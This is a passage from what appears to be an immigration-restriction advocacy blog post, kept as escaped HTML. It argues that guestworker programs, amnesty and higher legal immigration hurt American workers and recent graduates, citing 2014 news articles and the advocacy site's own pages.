They are eager to work. What they need is the opportunity to compete for jobs at fair wages, not unfair competition created by massive guestworker programs. In addition, just because we could benefit from some skilled immigration doesn\u2019t mean we should rubber stamp visas for every applicant with certain skills. We should develop and encourage our own STEM professionals, not discourage them by flooding the labor market.<\/p><\/blockquote>\n<p>The U.S. middle class is no longer the <a href=\"http:\/\/www.nytimes.com\/2014\/04\/23\/upshot\/the-american-middle-class-is-no-longer-the-worlds-richest.html?hp&amp;_r=1\">richest<\/a> in the world. High wage jobs lost during the recession are being replaced \u2013 but with <a href=\"http:\/\/www.washingtonpost.com\/blogs\/wonkblog\/wp\/2014\/04\/28\/wonkbook-americas-low-wage-recovery\/\">low wage jobs<\/a>. Recent college graduates are facing <a href=\"http:\/\/www.takebackimmigrationreform.com\/publications\/generation-jobless\">dismal<\/a> job prospects, moving back in with parents, and settling for <a href=\"http:\/\/www.mybanktracker.com\/news\/2014\/04\/22\/college-graduates-settling-paying-jobs\/\">minimum wage<\/a> jobs. Yet, the <a href=\"http:\/\/www.forbes.com\/pictures\/ehii45gjdi\/facebook-3\/\">moneyed supporters<\/a> of amnesty and more immigration advocate for policies that will only further exacerbate the plight of U.S. workers during this anemic economic recovery.<\/p>\n<p>Instead of addressing the needs of struggling Americans by curbing immigration, Senate and House <a href=\"http:\/\/www.takebackimmigrationreform.com\/legislation\/amnesty\/immigration-reform-2013\">immigration proposals<\/a> include amnesty AND <a href=\"http:\/\/www.takebackimmigrationreform.com\/issue\/immigrant-visa-20-year-projection-for-senate-bill-s-744\">increases<\/a> in legal immigration and <a href=\"http:\/\/www.takebackimmigrationreform.com\/issue\/guestworker-20-year-visa-projection-for-senate-bill-s-744\">guestworker programs<\/a>. This is not <a href=\"http:\/\/www.takebackimmigrationreform.com\/legislation\/amnesty\/takebackimmigrationreform\">true immigration reform<\/a>.
